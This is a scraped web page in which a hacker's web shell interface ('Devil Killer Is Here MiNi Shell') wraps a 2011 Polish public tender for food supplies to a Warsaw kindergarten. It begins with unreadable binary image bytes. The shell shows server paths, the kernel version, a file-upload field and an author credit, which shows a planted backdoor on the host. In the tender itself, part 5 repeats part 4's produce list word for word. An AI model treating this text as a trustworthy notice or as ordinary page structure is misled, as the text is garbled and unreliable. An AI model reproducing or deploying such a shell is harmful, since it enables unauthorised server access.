JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111214/330931-N-2011.html

<p class="kh_header"><b>Warszawa: DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH Z PODZIAŁEM NA 5 PAKIETÓW</b><br>
<b>Numer ogłoszenia: 330931 - 2011; data zamieszczenia: 14.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Nr 3 , ul. Grzybowska 7, 00-132 Warszawa, woj. mazowieckie, tel. 22 6209158, faks 22 6209158.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przedszkole3.bip.um.warszawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH Z PODZIAŁEM NA 5 PAKIETÓW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH Z PODZIAŁEM NA 5 PAKIETÓW.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.10.00.00-0, 15.80.00.00-6, 15.00.00.00-4, 15.30.00.00-1, 03.00.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz. U. nr 113 z 2010 r. poz. nr 759 z późn. zmian. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz. U. nr 113 z 2010 r. poz. nr 759 z późn. zmian. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz. U. nr 113 z 2010 r. poz. nr 759 z późn. zmian. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz. U. nr 113 z 2010 r. poz. nr 759 z późn. zmian. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz. U. nr 113 z 2010 r. poz. nr 759 z późn. zmian. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przedszkole3.bip.um.warszawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 00-132 Warszawa ul. Grzybowska 7..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.12.2011 godzina 10:00, miejsce: Przedszkole Nr 3, 00-132 Warszawa ul. Grzybowska 7..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb biały 450 g Szt. 420 Chleb razowy 450 g Szt. 230 Bułka paryska 330 g Szt. 530 Chałka drożdżowa 310 g Szt. 90 Pączki z marmoladą Szt. 150 Drożdżówki z budyniem Szt. 135 Ciastka kruche Kg 25 Faworki Kg 4 Babka drożdżowa Kg 15 Bułka mleczna 40 g Szt. 550..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mleko 3,2% opakowanie folia L 3200 Masło ostrołęckie delikatne 200 g Szt. 570 Ser biały tłusty Kg 130 Ser żółty tłusty Kg 30 Ser topiony różne smaki 0,200 Szt. 80 Śmietana 18% 200 ml Szt. 490 Serki bez konserwantów z mleka krowiego i z rozdrobnionych owoców, zawierające wapń i witaminę D typu Danonki, opakowanie plastikowe o pojemności 80 g Szt. 1200 Kefir 400 g Szt. 90 Mleko fermentowane z L.Casei Defensis, witaminami B6 i D, opakowanie plastikowe butelka o pojemności 100 g Szt. 400 Śmietana kremowa, opakowanie pojemnik plastikowy 500 ml Szt. 20 Serek mozarella Kg 10 Serek homogenizowany naturalny Kg 100..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.00.00-6, 15.53.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Mięso, wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurczak świeży waga 1,2 - 1,5 kg Kg 360 Filet z kurczaka świeży Kg 60 Udko z kurczaka świeże Kg 150 Pierś z indyka świeża Kg 30 Mięso wieprzowe od szynki świeże Kg 80 Schab środkowy b/k świeży Kg 50 Wołowe b/k świeże Kg 30 Wątróbka kurza świeża Kg 12 Cielęcina b/k świeża Kg 10 Boczek surowy b/k świeży Kg 3 Słonina świeża Kg 6 Żołądki drobiowe świeże Kg 8 Szynka gotowana świeża plastry Kg 25 Polędwica sopocka świeża plastry Kg 30 Parówki wieprzowe cienkie o zawartości 71% tłuszczu wieprzowego, opakowanie foliowe o pojemności 250 g Kg 50 Kiełbasa cienka podwawelska Kg 20 Kiełbasa żywiecka Kg 13 Filet z indyka wędzony Kg 4 Filet z kurczaka wędzony Kg 3..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.13.11.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Warzywa, owoce, mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ziemniaki białe, gat. I Kg 1050 Marchew, gat. I Kg 330 Pietruszka, gat. I Kg 80 Por Kg 80 Seler Kg 80 Cebula Kg 80 Kapusta biała główka Kg 55 Kapusta kiszona Kg 60 Kapusta czerwona główka Kg 20 Kapusta pekińska Kg 40 Buraki czerwone Kg 80 Kalafior świeży Szt. 30 Fasolka świeża żółta Kg 30 Ogórki kiszone, wiaderko plastikowe 1000 g Kg 60 Ogórek świeży długi Kg 60 Pomidory rozmiar 8 Kg 75 Papryka czerwona świeża Kg 28 Sałata masłowa Szt. 65 Koperek świeży 100 g pęczek 40 Szczypiorek 50 g pęczek 120 Pietruszka natka 100 g pęczek 235 Czosnek 50 g Szt. 80 Rzodkiewka czerwona pęczek 120 Cykoria Kg 3 Pieczarki świeże duże Kg 20 Botwinka pęczek 15 Kapusta młoda główka Szt. 15 Kapusta włoska główka Szt. 33 Cukinia świeża Kg 10 Kabaczek świeży Szt. 10 Rzodkiew biała Kg 8 Dynia Kg 10 Jabłka deserowe cortland, duże, gat. I Kg 380 Cytryny Kg 35 Sałata lodowa Szt. 50 Śliwki węgierki gat. I Kg 30 Truskawki świeże Kg 50 Winogrona gat. I Kg 12 Banany żółte Kg 115 Gruszki konferencje gat. I Kg 30 Mandarynki słodkie Kg 65 Pomarańcze słodkie Kg 43 Brzoskwinie świeże Kg 12 Kiwi świeże Kg 22 Ananas świeży Kg 100 Melon żółty Szt. 50 Morela świeża Kg 7 Jagody świeże Kg 5 Owoc sharon, kaki gat. I Szt. 100 Granaty Szt. 50 Brukselka świeża opakowanie 2,5 kg Kg 10 Kalafior mrożony, opakowanie foliowe o pojemności 2,5 kg Kg 35 Marchew mrożona mini, opakowanie 2,5 kg Kg 15 Brokuły mrożone, opakowanie foliowe 1,5 kg Kg 30 Włoszczyzna mrożona paski, opakowanie 2,5 kg Kg 60 Szpinak liściasty porcjowany mrożony, opakowanie foliowe o pojemności 2,5 kg Kg 30 Groszek zielony mrożony, opakowanie foliowe o pojemności 1,5 kg Kg 9 Truskawki mrożone, opakowanie foliowe o pojemności 2,5 kg Kg 80 Mieszanka kompotowa mrożona, opakowanie folia 2,5 kg Kg 55 Wiśnie bez pestek mrożone, opakowanie folia 2,5 kg Kg 60 Porzeczka czarna mrożona, opakowanie folia 2,5 kg Kg 45 Fasolka mrożona cięta żółta, opakowanie foliowe o pojemności 1,5 kg Kg 33 Frytki mrożone karbowane do piekarnika, opakowanie folia 2,5 kg Kg 5 Przyprawa do ogórków kiszonych Szt. 10..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9, 15.89.60.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ziemniaki białe, gat. I Kg 1050 Marchew, gat. I Kg 330 Pietruszka, gat. I Kg 80 Por Kg 80 Seler Kg 80 Cebula Kg 80 Kapusta biała główka Kg 55 Kapusta kiszona Kg 60 Kapusta czerwona główka Kg 20 Kapusta pekińska Kg 40 Buraki czerwone Kg 80 Kalafior świeży Szt. 30 Fasolka świeża żółta Kg 30 Ogórki kiszone, wiaderko plastikowe 1000 g Kg 60 Ogórek świeży długi Kg 60 Pomidory rozmiar 8 Kg 75 Papryka czerwona świeża Kg 28 Sałata masłowa Szt. 65 Koperek świeży 100 g pęczek 40 Szczypiorek 50 g pęczek 120 Pietruszka natka 100 g pęczek 235 Czosnek 50 g Szt. 80 Rzodkiewka czerwona pęczek 120 Cykoria Kg 3 Pieczarki świeże duże Kg 20 Botwinka pęczek 15 Kapusta młoda główka Szt. 15 Kapusta włoska główka Szt. 33 Cukinia świeża Kg 10 Kabaczek świeży Szt. 10 Rzodkiew biała Kg 8 Dynia Kg 10 Jabłka deserowe cortland, duże, gat. I Kg 380 Cytryny Kg 35 Sałata lodowa Szt. 50 Śliwki węgierki gat. I Kg 30 Truskawki świeże Kg 50 Winogrona gat. I Kg 12 Banany żółte Kg 115 Gruszki konferencje gat. I Kg 30 Mandarynki słodkie Kg 65 Pomarańcze słodkie Kg 43 Brzoskwinie świeże Kg 12 Kiwi świeże Kg 22 Ananas świeży Kg 100 Melon żółty Szt. 50 Morela świeża Kg 7 Jagody świeże Kg 5 Owoc sharon, kaki gat. I Szt. 100 Granaty Szt. 50 Brukselka świeża opakowanie 2,5 kg Kg 10 Kalafior mrożony, opakowanie foliowe o pojemności 2,5 kg Kg 35 Marchew mrożona mini, opakowanie 2,5 kg Kg 15 Brokuły mrożone, opakowanie foliowe 1,5 kg Kg 30 Włoszczyzna mrożona paski, opakowanie 2,5 kg Kg 60 Szpinak liściasty porcjowany mrożony, opakowanie foliowe o pojemności 2,5 kg Kg 30 Groszek zielony mrożony, opakowanie foliowe o pojemności 1,5 kg Kg 9 Truskawki mrożone, opakowanie foliowe o pojemności 2,5 kg Kg 80 Mieszanka kompotowa mrożona, opakowanie folia 2,5 kg Kg 55 Wiśnie bez pestek mrożone, opakowanie folia 2,5 kg Kg 60 Porzeczka czarna mrożona, opakowanie folia 2,5 kg Kg 45 Fasolka mrożona cięta żółta, opakowanie foliowe o pojemności 1,5 kg Kg 33 Frytki mrożone karbowane do piekarnika, opakowanie folia 2,5 kg Kg 5 Przyprawa do ogórków kiszonych Szt. 10..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com